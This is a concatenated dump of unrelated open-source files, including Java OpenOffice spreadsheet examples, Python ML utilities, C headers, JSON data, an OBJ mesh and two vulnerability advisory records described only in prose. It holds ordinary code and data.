            XCell xCell = xSpreadsheet.getCellByPosition(0, 0);
            xCell.setValue(21);
            xCell = xSpreadsheet.getCellByPosition(0, 1);
            xCell.setValue(21);
            xCell = xSpreadsheet.getCellByPosition(0, 2);
            xCell.setFormula("=sum(A1:A2)");

            XPropertySet xCellProps = (XPropertySet)UnoRuntime.queryInterface(
                XPropertySet.class, xCell);
            xCellProps.setPropertyValue("CellStyle", "Result");

            XModel xSpreadsheetModel = (XModel)UnoRuntime.queryInterface(
                XModel.class, xSpreadsheetComponent);
            XController xSpreadsheetController = xSpreadsheetModel.getCurrentController();
            XSpreadsheetView xSpreadsheetView = (XSpreadsheetView)
                UnoRuntime.queryInterface(XSpreadsheetView.class,
                                          xSpreadsheetController);
            xSpreadsheetView.setActiveSheet(xSpreadsheet);

            // *********************************************************
            // example for use of enum types
            xCellProps.setPropertyValue("VertJustify",
                                        com.sun.star.table.CellVertJustify.TOP);

            // *********************************************************
            // example for a sequence of PropertyValue structs
            // create an array with one PropertyValue struct, it contains
            // references only
            loadProps = new PropertyValue[1];

            // instantiate PropertyValue struct and set its member fields
            PropertyValue asTemplate = new PropertyValue();
            asTemplate.Name = "AsTemplate";
            asTemplate.Value = new Boolean(true);

            // assign PropertyValue struct to array of references for PropertyValue
            // structs
            loadProps[0] = asTemplate;

            // load calc file as template
            //xSpreadsheetComponent = xComponentLoader.loadComponentFromURL(
            //    "file:///c:/temp/DataAnalysys.ods", "_blank", 0, loadProps);

            // *********************************************************
            // example for use of XEnumerationAccess: walk all formula cells
            XCellRangesQuery xCellQuery = (XCellRangesQuery)
                UnoRuntime.queryInterface(XCellRangesQuery.class, sheet);
            XSheetCellRanges xFormulaCells = xCellQuery.queryContentCells(
                (short)com.sun.star.sheet.CellFlags.FORMULA);
            XEnumerationAccess xFormulas = xFormulaCells.getCells();
            XEnumeration xFormulaEnum = xFormulas.createEnumeration();

            while (xFormulaEnum.hasMoreElements()) {
                Object formulaCell = xFormulaEnum.nextElement();
                xCell = (XCell)UnoRuntime.queryInterface(XCell.class, formulaCell);
                XCellAddressable xCellAddress = (XCellAddressable)
                    UnoRuntime.queryInterface(XCellAddressable.class, xCell);
                System.out.println("Formula cell in column " +
                                   xCellAddress.getCellAddress().Column
                                   + ", row " + xCellAddress.getCellAddress().Row
                                   + " contains " + xCell.getFormula());
            }
        }
        catch (java.lang.Exception e){
            e.printStackTrace();
        }
        finally {
            System.exit( 0 );
        }
    }
}
// import com.sun.star.uno.UnoRuntime;
// import com.sun.star.uno.XComponentContext;
// import com.sun.star.lang.XMultiComponentFactory;
// import com.sun.star.lang.XComponent;
// import com.sun.star.beans.XPropertySet;
// import com.sun.star.beans.PropertyValue;
// import com.sun.star.sheet.XSpreadsheetDocument;
// import com.sun.star.sheet.XSpreadsheets;
// import com.sun.star.sheet.XSpreadsheet;
// import com.sun.star.sheet.XSpreadsheetView;
// import com.sun.star.sheet.XCellRangesQuery;
// import com.sun.star.sheet.XSheetCellRanges;
// import com.sun.star.sheet.XCellAddressable;
// import com.sun.star.table.XCell;
// import com.sun.star.frame.XModel;
// import com.sun.star.frame.XController;
// import com.sun.star.frame.XComponentLoader;
// import com.sun.star.container.XEnumeration;
// import com.sun.star.container.XEnumerationAccess;
// import com.sun.star.uno.AnyConverter;
// /**
// *
// * @author dschulten
// */
// public class FirstLoadComponent {
// /** Creates a new instance of FirstLoadComponent */
// public FirstLoadComponent() {
// }
// /**
// * @param args the command line arguments
// */
// private XComponentContext xRemoteContext = null;
// private XMultiComponentFactory xRemoteServiceManager = null;
// public static void main(String[] args) {
// FirstLoadComponent firstLoadComponent1 = new FirstLoadComponent();
// try {
// firstLoadComponent1.useConnection();
// }
// catch (java.lang.Exception e){
// System.out.println(e.getMessage());
// e.printStackTrace();
// }
// finally {
// System.exit(0);
// }
// }
// private void useConnection() throws java.lang.Exception {
// try {
// // get the remote office component context
// xRemoteContext = com.sun.star.comp.helper.Bootstrap.bootstrap();
// System.out.println("Connected to a running office ...");
// xRemoteServiceManager = xRemoteContext.getServiceManager();
// }
// catch( Exception e) {
// e.printStackTrace();
// System.exit(1);
// }
// try {
// Object desktop = xRemoteServiceManager.createInstanceWithContext(
// "com.sun.star.frame.Desktop", xRemoteContext);
// XComponentLoader xComponentLoader = (XComponentLoader)
// UnoRuntime.queryInterface(XComponentLoader.class, desktop);
// PropertyValue[] loadProps = new PropertyValue[0];
// XComponent xSpreadsheetComponent = xComponentLoader.loadComponentFromURL("private:factory/scalc", "_blank", 0, loadProps);
// XSpreadsheetDocument xSpreadsheetDocument = (XSpreadsheetDocument)
// UnoRuntime.queryInterface(XSpreadsheetDocument.class,
// xSpreadsheetComponent);
// XSpreadsheets xSpreadsheets = xSpreadsheetDocument.getSheets();
// xSpreadsheets.insertNewByName("MySheet", (short)0);
// com.sun.star.uno.Type elemType = xSpreadsheets.getElementType();
// System.out.println(elemType.getTypeName());
// Object sheet = xSpreadsheets.getByName("MySheet");
// XSpreadsheet xSpreadsheet = (XSpreadsheet)UnoRuntime.queryInterface(
// XSpreadsheet.class, sheet);
// XCell xCell = xSpreadsheet.getCellByPosition(0, 0);
// xCell.setValue(21);
// xCell = xSpreadsheet.getCellByPosition(0, 1);
// xCell.setValue(21);
// xCell = xSpreadsheet.getCellByPosition(0, 2);
// xCell.setFormula("=sum(A1:A2)");
// XPropertySet xCellProps = (XPropertySet)UnoRuntime.queryInterface(
// XPropertySet.class, xCell);
// xCellProps.setPropertyValue("CellStyle", "Result");
// XModel xSpreadsheetModel = (XModel)UnoRuntime.queryInterface(
// XModel.class, xSpreadsheetComponent);
// XController xSpreadsheetController = xSpreadsheetModel.getCurrentController();
// XSpreadsheetView xSpreadsheetView = (XSpreadsheetView)
// UnoRuntime.queryInterface(XSpreadsheetView.class,
// xSpreadsheetController);
// xSpreadsheetView.setActiveSheet(xSpreadsheet);
// // *********************************************************
// // example for use of enum types
// xCellProps.setPropertyValue("VertJustify",
// com.sun.star.table.CellVertJustify.TOP);
// // *********************************************************
// // example for a sequence of PropertyValue structs
// // create an array with one PropertyValue struct, it contains
// // references only
// loadProps = new PropertyValue[1];
// // instantiate PropertyValue struct and set its member fields
// PropertyValue asTemplate = new PropertyValue();
// asTemplate.Name = "AsTemplate";
// asTemplate.Value = new Boolean(true);
// // assign PropertyValue struct to array of references for PropertyValue
// // structs
// loadProps[0] = asTemplate;
// // load calc file as template
// //xSpreadsheetComponent = xComponentLoader.loadComponentFromURL(
// // "file:///c:/temp/DataAnalysys.ods", "_blank", 0, loadProps);
// // *********************************************************
// // example for use of XEnumerationAccess
// XCellRangesQuery xCellQuery = (XCellRangesQuery)
// UnoRuntime.queryInterface(XCellRangesQuery.class, sheet);
// XSheetCellRanges xFormulaCells = xCellQuery.queryContentCells(
// (short)com.sun.star.sheet.CellFlags.FORMULA);
// XEnumerationAccess xFormulas = xFormulaCells.getCells();
// XEnumeration xFormulaEnum = xFormulas.createEnumeration();
// while (xFormulaEnum.hasMoreElements()) {
// Object formulaCell = xFormulaEnum.nextElement();
// xCell = (XCell)UnoRuntime.queryInterface(XCell.class, formulaCell);
// XCellAddressable xCellAddress = (XCellAddressable)
// UnoRuntime.queryInterface(XCellAddressable.class, xCell);
// System.out.println("Formula cell in column " +
// xCellAddress.getCellAddress().Column
// + ", row " + xCellAddress.getCellAddress().Row
// + " contains " + xCell.getFormula());
// }
// }
// catch( com.sun.star.lang.DisposedException e ) { //works from Patch 1
// xRemoteContext = null;
// throw e;
// }
// }
// }
| 6,086 |
380 | <filename>Java/Algorithms/Math/CelToFh.java
class CelToFh{
    /**
     * Converts a temperature from Celsius to Fahrenheit.
     * The scaled value is truncated before the offset is added, matching the
     * original inline expression {@code (int)(cel*(1.8))+32}.
     *
     * @param cel temperature in degrees Celsius
     * @return temperature in degrees Fahrenheit (fraction truncated)
     */
    static int celsiusToFahrenheit(int cel) {
        return (int) (cel * 1.8) + 32;
    }

    public static void main(String[] args) {
        int cel = 32;
        // Prints 89 (32 C -> 89.6 F, truncated before the +32 offset).
        System.out.println(celsiusToFahrenheit(cel));
    }
}
826 | <reponame>zwh930712/densenet.pytorch
# From https://gist.github.com/apaszke/01aae7a0494c55af6242f06fad1f8b70
from graphviz import Digraph
from torch.autograd import Variable
def save(fname, creator):
    """Render the autograd graph rooted at ``creator`` to a Graphviz .dot file.

    Walks backwards from ``creator`` through ``previous_functions`` (legacy
    pre-0.4 PyTorch autograd API — TODO confirm target torch version) and
    emits one box node per Variable/Function plus an edge per dependency.
    """
    dot = Digraph(comment='LRP',
                  node_attr={'style': 'filled', 'shape': 'box'})
                  #, 'fillcolor': 'lightblue'})
    # Guard against revisiting shared subgraphs (diamond dependencies).
    seen = set()
    def add_nodes(var):
        if var not in seen:
            if isinstance(var, Variable):
                # Leaf tensors are labeled with their size and highlighted.
                dot.node(str(id(var)), str(var.size()), fillcolor='lightblue')
            else:
                # Intermediate autograd functions are labeled with their type.
                dot.node(str(id(var)), type(var).__name__)
            seen.add(var)
            if hasattr(var, 'previous_functions'):
                for u in var.previous_functions:
                    # Edge from producer to consumer; recurse into producers.
                    dot.edge(str(id(u[0])), str(id(var)))
                    add_nodes(u[0])
    add_nodes(creator)
    dot.save(fname)
| 448 |
678 | /* struct::tree - critcl - layer 1 declarations
* (a) Data structures.
*/
#ifndef _DS_H
#define _DS_H 1
#include "tcl.h"
/* Forward declarations of references to trees & nodes.
 */
typedef struct T* TPtr;
typedef struct TN* TNPtr;
/* Node structure.
 */
typedef struct TN {
    /* Node identity / handle */
    /* Internal rep should be of type */
    /* 'tcllib::struct::tree/critcl::node'. */
    /* See below. */
    Tcl_Obj* name;
    Tcl_HashEntry* he;
    /* Basic linkage of node to its tree */
    TPtr tree; /* Tree the node belongs to */
    TNPtr nextleaf; /* Double linked list of all */
    TNPtr prevleaf; /* leaf nodes */
    TNPtr nextnode; /* Double linked list of all */
    TNPtr prevnode; /* nodes */
    /* Node navigation. Parent/Children/Siblings */
    TNPtr parent; /* Parent node */
    TNPtr* child; /* Array of children. Can
                   * be NULL. leaf node implies
                   * NULL, and vice versa */
    int nchildren; /* # nodes used in previous array */
    int maxchildren; /* Size of previous array */
    TNPtr left; /* Sibling to the left, NULL if no such */
    TNPtr right; /* Sibling to the right, NULL if no such */
    /* Node attributes */
    Tcl_HashTable* attr; /* Node attributes. NULL if the
                          * node has none (lazily created) */
    /* Cache for properties of the node based on the tree
     * structure. Only valid while T.structure is true; recomputed
     * on demand after structural changes.
     */
    int index; /* Index of node in 'child' array of its
                * parent */
    int depth; /* Distance to root node.
                * 0 <=> root */
    int height; /* Distance to deepest child.
                * 0 <=> Leaf. */
    int desc; /* #Descendants */
} TN;
/* Tree structure
 */
typedef struct T {
    Tcl_Command cmd; /* Token of the object command for
                      * the tree */
    Tcl_HashTable node; /* Mapping
                         * Node names -> Node structure */
    int counter; /* Counter used by the generator
                  * of node names */
    TN* root; /* Root node of the tree. */
    TN* leaves; /* List of all leaf nodes */
    int nleaves; /* List length */
    TN* nodes; /* List of all nodes */
    int nnodes; /* List length */
    int structure; /* Boolean flag. Set to true if the
                    * depth/height/desc information
                    * in the nodes is valid. Reset to
                    * false by all operations changing
                    * the structure of the tree. */
    /* Generation of node handles. Tree local storage, makes code thread
     * oblivious. Buffer holds "nodeNNN" style names; 50 bytes is ample
     * for any int-sized counter.
     */
    char handle [50];
} T;
#endif /* _DS_H */
/*
* Local Variables:
* mode: c
* c-basic-offset: 4
* fill-column: 78
* End:
*/
| 909 |
720 | <reponame>stephanenicolas/dependency-analysis-android-gradle-plugin
package com.seattleshelter.core.di;
import java.lang.System;
// Dependency-injection qualifier distinguishing "Id" bindings (usable on
// methods and parameters, retained at runtime for the DI framework).
// NOTE: this is Kotlin-compiler-generated Java stub output (see @kotlin.Metadata);
// edit the original Kotlin source rather than this file.
@kotlin.Metadata(mv = {1, 1, 15}, bv = {1, 0, 3}, k = 1, d1 = {"\u0000\n\n\u0002\u0018\u0002\n\u0002\u0010\u001b\n\u0000\b\u0087\u0002\u0018\u00002\u00020\u0001B\u0000\u00a8\u0006\u0002"}, d2 = {"Lcom/seattleshelter/core/di/Id;", "", "core_debug"})
@java.lang.annotation.Target(value = {java.lang.annotation.ElementType.METHOD, java.lang.annotation.ElementType.PARAMETER})
@java.lang.annotation.Retention(value = java.lang.annotation.RetentionPolicy.RUNTIME)
@kotlin.annotation.Retention(value = kotlin.annotation.AnnotationRetention.RUNTIME)
@kotlin.annotation.Target(allowedTargets = {kotlin.annotation.AnnotationTarget.FUNCTION, kotlin.annotation.AnnotationTarget.VALUE_PARAMETER})
@javax.inject.Qualifier()
public abstract @interface Id {
}
832 | <filename>app/src/main/assets/api/superman_vs_batman/gallery/3.json<gh_stars>100-1000
[
{
"image": "http://batmanvsuperman.dccomics.com/images/gallery/img21.jpg"
},
{
"image": "http://batmanvsuperman.dccomics.com/images/gallery/img22.jpg"
}
] | 112 |
689 | """Anomaly Map Generator for the STFPM model implementation."""
# Copyright (C) 2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions
# and limitations under the License.
from typing import Dict, Tuple, Union
import torch
import torch.nn.functional as F
from omegaconf import ListConfig
from torch import Tensor
class AnomalyMapGenerator:
    """Builds anomaly heatmaps from teacher/student feature pyramids (STFPM)."""

    def __init__(
        self,
        image_size: Union[ListConfig, Tuple],
    ):
        self.distance = torch.nn.PairwiseDistance(p=2, keepdim=True)
        # Normalize the configured size to a plain tuple for F.interpolate.
        if isinstance(image_size, tuple):
            self.image_size = image_size
        else:
            self.image_size = tuple(image_size)

    def compute_layer_map(self, teacher_features: Tensor, student_features: Tensor) -> Tensor:
        """Score one feature layer.

        Args:
            teacher_features (Tensor): Feature map produced by the teacher.
            student_features (Tensor): Feature map produced by the student.

        Returns:
            Per-location scores (half squared L2 distance between the
            L2-normalized maps), upscaled to the configured image size.
        """
        teacher_norm = F.normalize(teacher_features)
        student_norm = F.normalize(student_features)
        difference = teacher_norm - student_norm
        layer_map = 0.5 * torch.norm(difference, p=2, dim=-3, keepdim=True) ** 2
        return F.interpolate(layer_map, size=self.image_size, align_corners=False, mode="bilinear")

    def compute_anomaly_map(
        self, teacher_features: Dict[str, Tensor], student_features: Dict[str, Tensor]
    ) -> torch.Tensor:
        """Fuse per-layer maps into one heatmap via element-wise product.

        Args:
            teacher_features (Dict[str, Tensor]): Teacher features per layer.
            student_features (Dict[str, Tensor]): Student features per layer.

        Returns:
            The combined anomaly map.
        """
        batch_size = list(teacher_features.values())[0].shape[0]
        anomaly_map = torch.ones(batch_size, 1, self.image_size[0], self.image_size[1])
        for layer_name in teacher_features:
            layer_map = self.compute_layer_map(teacher_features[layer_name], student_features[layer_name])
            # Follow the device of the computed layer map before multiplying.
            anomaly_map = anomaly_map.to(layer_map.device)
            anomaly_map = anomaly_map * layer_map
        return anomaly_map

    def __call__(self, **kwds: Dict[str, Tensor]) -> torch.Tensor:
        """Return the anomaly map.

        Requires `teacher_features` and `student_features` keyword arguments.

        Example:
            >>> anomaly_map_generator = AnomalyMapGenerator(image_size=tuple(hparams.model.input_size))
            >>> output = self.anomaly_map_generator(
                    teacher_features=teacher_features,
                    student_features=student_features
                )

        Raises:
            ValueError: If either expected keyword is missing.

        Returns:
            torch.Tensor: anomaly map
        """
        if "teacher_features" not in kwds or "student_features" not in kwds:
            raise ValueError(f"Expected keys `teacher_features` and `student_features. Found {kwds.keys()}")
        teacher: Dict[str, Tensor] = kwds["teacher_features"]
        student: Dict[str, Tensor] = kwds["student_features"]
        return self.compute_anomaly_map(teacher, student)
| 1,439 |
3,102 | <filename>clang/test/Analysis/Inputs/system-header-simulator-for-nullability-cxx.h
#pragma clang system_header
// Minimal type with a user-provided (empty) destructor; exercised by the
// static-analyzer nullability tests that include this simulated system header.
struct S {
  ~S(){}
};
// Constructs a local S whose destructor runs at end of scope.
void foo() {
  S s;
}
| 66 |
1,111 | <reponame>immujahidkhan/Android-ActionItemBadge
package com.mikepenz.actionitembadge.library.utils;
import android.annotation.SuppressLint;
import android.content.Context;
import android.graphics.drawable.Drawable;
import android.view.View;
import static android.util.TypedValue.COMPLEX_UNIT_DIP;
import static android.util.TypedValue.applyDimension;
/**
* Created by mikepenz on 02.07.15.
*/
public class UIUtil {
/**
* helper method to set the background depending on the android version
*
* @param v
* @param d
*/
@SuppressLint("NewApi")
public static void setBackground(View v, Drawable d) {
if (android.os.Build.VERSION.SDK_INT < android.os.Build.VERSION_CODES.JELLY_BEAN) {
v.setBackgroundDrawable(d);
} else {
v.setBackground(d);
}
}
public static int convertDpToPx(Context context, float dp) {
return (int) applyDimension(COMPLEX_UNIT_DIP, dp, context.getResources().getDisplayMetrics());
}
}
| 401 |
411 | <gh_stars>100-1000
"""
Migration for the Submitty system.
adds submitty admin json
"""
from pathlib import Path
import shutil
import json
import os
def up(config):
    """Create the submitty admin credentials file if it does not exist yet.

    Writes an empty-credential JSON template, then restricts it to
    root / submitty_daemon with mode 0440.
    """
    admin_path = Path(config.submitty['submitty_install_dir'], 'config', 'submitty_admin.json')
    admin_file = str(admin_path)
    if os.path.isfile(admin_file):
        # Never clobber an existing (possibly populated) credentials file.
        return
    defaults = {
        'submitty_admin_username': '',
        'submitty_admin_password': ''
    }
    with open(admin_file, 'w') as handle:
        json.dump(defaults, handle, indent=2)
    # Lock the file down after it is written.
    shutil.chown(admin_file, 'root', 'submitty_daemon')
    os.chmod(admin_file, 0o440)
def down(config):
    """No-op rollback: the credentials file is intentionally left in place."""
    pass
| 318 |
348 | <gh_stars>100-1000
{"nom":"Saint-Gervais-la-Forêt","circ":"1ère circonscription","dpt":"Loir-et-Cher","inscrits":2649,"abs":1241,"votants":1408,"blancs":11,"nuls":10,"exp":1387,"res":[{"nuance":"MDM","nom":"<NAME>","voix":555},{"nuance":"SOC","nom":"M. <NAME>","voix":185},{"nuance":"FI","nom":"Mme <NAME>","voix":160},{"nuance":"LR","nom":"<NAME>","voix":157},{"nuance":"FN","nom":"M. <NAME>","voix":145},{"nuance":"DVD","nom":"Mme <NAME>","voix":61},{"nuance":"COM","nom":"Mme <NAME>","voix":46},{"nuance":"ECO","nom":"M. <NAME>","voix":34},{"nuance":"ECO","nom":"M. <NAME>","voix":23},{"nuance":"EXG","nom":"Mme <NAME>","voix":11},{"nuance":"DIV","nom":"M. <NAME>","voix":10}]} | 280 |
405 | <gh_stars>100-1000
from .australia import (
Australia,
AustralianCapitalTerritory,
NewSouthWales,
NorthernTerritory,
Queensland,
SouthAustralia,
Tasmania,
Hobart,
Victoria,
WesternAustralia
)
from .marshall_islands import MarshallIslands
from .new_zealand import NewZealand
# Public API of this calendar package; keep in sync with the imports above.
__all__ = (
    # Australia and al.
    'Australia',
    'AustralianCapitalTerritory',
    'NewSouthWales',
    'NorthernTerritory',
    'Queensland',
    'SouthAustralia',
    'Tasmania',
    'Hobart',
    'Victoria',
    'WesternAustralia',
    # Other oceanian countries
    'MarshallIslands',
    'NewZealand',
)
| 253 |
892 | {
"schema_version": "1.2.0",
"id": "GHSA-p4fq-7p56-g8v4",
"modified": "2022-05-01T17:41:38Z",
"published": "2022-05-01T17:41:38Z",
"aliases": [
"CVE-2007-0083"
],
"details": "Cross-site scripting (XSS) vulnerability in Nuked Klan 1.7 and earlier allows remote attackers to inject arbitrary web script or HTML via a javascript: URI in a getURL statement in a .swf file, as demonstrated by \"Remote Cookie Disclosure.\" NOTE: it could be argued that this is an issue in Shockwave instead of Nuked Klan.",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2007-0083"
},
{
"type": "WEB",
"url": "http://osvdb.org/33368"
},
{
"type": "WEB",
"url": "http://securityreason.com/securityalert/2101"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/archive/1/455726/100/0/threaded"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/21850"
}
],
"database_specific": {
"cwe_ids": [
],
"severity": "MODERATE",
"github_reviewed": false
}
} | 514 |
1,248 | {
"name": "replicatedFrom",
"typeName": "array<AtlasServer>",
"cardinality": "SET",
"isIndexable": false,
"isOptional": true,
"isUnique": false,
"options": {
"isSoftReference": "true"
}
}
| 84 |
892 | {
"schema_version": "1.2.0",
"id": "GHSA-7vw4-jppr-mcc9",
"modified": "2022-05-01T07:22:34Z",
"published": "2022-05-01T07:22:34Z",
"aliases": [
"CVE-2006-4865"
],
"details": "<NAME> PhpQuiz allows remote attackers to obtain sensitive information via a direct request to cfgphpquiz/install.php and other unspecified vectors.",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2006-4865"
},
{
"type": "WEB",
"url": "http://securityreason.com/securityalert/1604"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/archive/1/446112/100/0/threaded"
}
],
"database_specific": {
"cwe_ids": [
],
"severity": "MODERATE",
"github_reviewed": false
}
} | 379 |
335 | <reponame>Safal08/Hacktoberfest-1<gh_stars>100-1000
{
"word": "Vair",
"definitions": [
"Fur obtained from a variety of red squirrel, used in the 13th and 14th centuries as a trimming or lining for garments.",
"Fur represented by interlocking rows of shield-shaped or bell-shaped figures which are typically alternately blue and white, as a tincture."
],
"parts-of-speech": "Noun"
} | 145 |
1,463 | <reponame>aaye/OpenSubdiv
//
// Copyright 2013 Pixar
//
// Licensed under the Apache License, Version 2.0 (the "Apache License")
// with the following modification; you may not use this file except in
// compliance with the Apache License and the following modification to it:
// Section 6. Trademarks. is deleted and replaced with:
//
// 6. Trademarks. This License does not grant permission to use the trade
// names, trademarks, service marks, or product names of the Licensor
// and its affiliates, except as required to comply with Section 4(c) of
// the License and to reproduce the content of the NOTICE file.
//
// You may obtain a copy of the Apache License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the Apache License with the above modification is
// distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the Apache License for the specific
// language governing permissions and limitations under the Apache License.
//
// Inlined Wavefront OBJ mesh (positions, dummy UVs, normals, mixed tri/quad/
// n-gon faces) used as a regression shape for Catmull-Clark Gregory patches.
// Data is verbatim; do not reformat.
static const std::string catmark_gregory_test5 =
"v -1.356808 -0.083528 1.425768\n"
"v 0.019224 -1.134152 1.314912\n"
"v -0.796312 -0.701552 2.527352\n"
"v -1.272248 -0.262936 0.526768\n"
"v -0.355528 -0.399336 -1.325872\n"
"v 0.728824 -0.419232 1.251256\n"
"v 0.595688 -0.416328 0.744344\n"
"v -0.245000 -0.965184 0.623632\n"
"v -0.030728 -0.345264 0.519104\n"
"v 0.391584 -0.345768 0.611264\n"
"v -0.354248 -0.847304 -0.035960\n"
"v 0.591456 -0.431424 0.343048\n"
"v -0.683168 -0.681144 0.361080\n"
"v 0.015632 -0.691216 -0.980472\n"
"v 0.754360 -0.387264 -0.665952\n"
"v -0.121000 -0.535808 -1.348384\n"
"v -0.150464 -0.413896 0.236536\n"
"v -1.068432 -0.389648 -0.244392\n"
"v -0.628200 -0.670280 0.103376\n"
"v 0.472696 -0.352880 0.412584\n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vn -0.598314 -0.016294 0.801096\n"
"vn -0.091008 -0.181684 0.979137\n"
"vn -0.598314 -0.016294 0.801096\n"
"vn -0.583785 -0.026634 0.811471\n"
"vn -0.452613 -0.260227 0.852891\n"
"vn 0.608152 -0.306705 0.732177\n"
"vn 0.541220 -0.545713 0.639748\n"
"vn -0.005690 -0.537551 0.843212\n"
"vn 0.287651 -0.459659 0.840221\n"
"vn 0.233994 -0.625569 0.744252\n"
"vn -0.089072 0.238062 0.967157\n"
"vn 0.164711 0.473793 0.865096\n"
"vn -0.264037 -0.175309 0.948447\n"
"vn -0.129696 -0.168466 0.977138\n"
"vn 0.388886 0.011631 0.921212\n"
"vn -0.452613 -0.260227 0.852891\n"
"vn 0.155237 0.498054 0.853137\n"
"vn -0.501269 -0.167537 0.848917\n"
"vn -0.228587 0.075152 0.970618\n"
"vn -0.078590 0.612564 0.786504\n"
"s off\n"
"f 13/13/13 9/9/9 8/8/8\n"
"f 11/11/11 17/17/17 19/19/19\n"
"f 11/11/11 12/12/12 20/20/20 17/17/17\n"
"f 7/7/7 6/6/6 2/2/2 8/8/8\n"
"f 9/9/9 10/10/10 7/7/7 8/8/8\n"
"f 14/14/14 15/15/15 12/12/12 11/11/11\n"
"f 18/18/18 5/5/5 16/16/16 14/14/14 11/11/11 19/19/19\n"
"f 2/2/2 3/3/3 1/1/1 4/4/4 13/13/13 8/8/8\n"
"f 4/4/4 18/18/18 19/19/19 13/13/13\n"
"f 17/17/17 20/20/20 10/10/10 9/9/9\n"
"f 19/19/19 17/17/17 9/9/9 13/13/13\n"
"\n"
;
| 1,681 |
852 | <filename>Configuration/Eras/python/Modifier_phase2_GE0_cff.py
import FWCore.ParameterSet.Config as cms
# Era modifier toggling the Phase-2 GE0 muon-detector configuration; it
# carries no settings itself and is applied via process customisations.
phase2_GE0 = cms.Modifier()
| 51 |
310 | <gh_stars>100-1000
{
"name": "<NAME>",
"description": "A 3D rendering and animation tool.",
"url": "https://www.daz3d.com/get_studio"
}
| 58 |
1,056 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.netbeans.modules.php.analysis;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.Map;
import java.util.concurrent.atomic.AtomicBoolean;
import java.util.logging.Level;
import java.util.logging.Logger;
import java.util.prefs.Preferences;
import org.netbeans.api.annotations.common.CheckForNull;
import org.netbeans.api.annotations.common.StaticResource;
import org.netbeans.api.fileinfo.NonRecursiveFolder;
import org.netbeans.modules.analysis.spi.Analyzer;
import org.netbeans.modules.php.analysis.commands.CodingStandardsFixer;
import org.netbeans.modules.php.analysis.options.AnalysisOptions;
import org.netbeans.modules.php.analysis.ui.analyzer.CodingStandardsFixerCustomizerPanel;
import org.netbeans.modules.php.analysis.util.AnalysisUtils;
import org.netbeans.modules.php.analysis.util.Mappers;
import org.netbeans.modules.php.api.executable.InvalidPhpExecutableException;
import org.netbeans.modules.php.api.util.StringUtils;
import org.netbeans.modules.refactoring.api.Scope;
import org.netbeans.spi.editor.hints.ErrorDescription;
import org.openide.filesystems.FileObject;
import org.openide.util.NbBundle;
import org.openide.util.lookup.ServiceProvider;
/**
 * NetBeans Analyzer SPI implementation that runs the PHP Coding Standards
 * Fixer over every source root, file and folder in the inspection scope and
 * maps the tool's results to editor {@link ErrorDescription}s.
 */
public final class CodingStandardsFixerAnalyzerImpl implements Analyzer {
    private static final Logger LOGGER = Logger.getLogger(CodingStandardsFixerAnalyzerImpl.class.getName());
    // Analysis context (scope, settings, progress reporting) supplied by the IDE.
    private final Context context;
    // Set by cancel() (possibly from another thread); polled between items.
    private final AtomicBoolean cancelled = new AtomicBoolean();
    public CodingStandardsFixerAnalyzerImpl(Context context) {
        this.context = context;
    }
    @NbBundle.Messages({
        "CodingStandardsFixerAnalyzerImpl.codingStandardsFixer.error=Coding Standards Fixer is not valid",
        "CodingStandardsFixerAnalyzerImpl.codingStandardsFixer.error.description=Invalid coding standards fixer set in IDE Options.",
    })
    @Override
    public Iterable<? extends ErrorDescription> analyze() {
        // Bail out early if the analyzer is disabled in the customizer settings.
        Preferences settings = context.getSettings();
        if (settings != null && !settings.getBoolean(CodingStandardsFixerCustomizerPanel.ENABLED, false)) {
            return Collections.emptyList();
        }
        // Resolve the fixer executable; report (don't throw) if misconfigured.
        CodingStandardsFixer codingStandardsFixer = getValidCodingStandardsFixer();
        if (codingStandardsFixer == null) {
            context.reportAnalysisProblem(
                    Bundle.CodingStandardsFixerAnalyzerImpl_codingStandardsFixer_error(),
                    Bundle.CodingStandardsFixerAnalyzerImpl_codingStandardsFixer_error_description());
            return Collections.emptyList();
        }
        // Collect per-analysis parameters (customizer settings with global
        // options as fallback) into a single params object.
        String version = getValidCodingStandardsFixerVersion();
        String level = getValidCodingStandardsFixerLevel();
        String config = getValidCodingStandardsFixerConfig();
        String options = getValidCodingStandardsFixerOptions();
        CodingStandardsFixerParams codingStandardsFixerParams = new CodingStandardsFixerParams()
                .setVersion(version)
                .setLevel(level)
                .setConfig(config)
                .setOptions(options);
        Scope scope = context.getScope();
        // Pre-count PHP files so progress can be reported as a fraction.
        Map<FileObject, Integer> fileCount = AnalysisUtils.countPhpFiles(scope);
        int totalCount = 0;
        for (Integer count : fileCount.values()) {
            totalCount += count;
        }
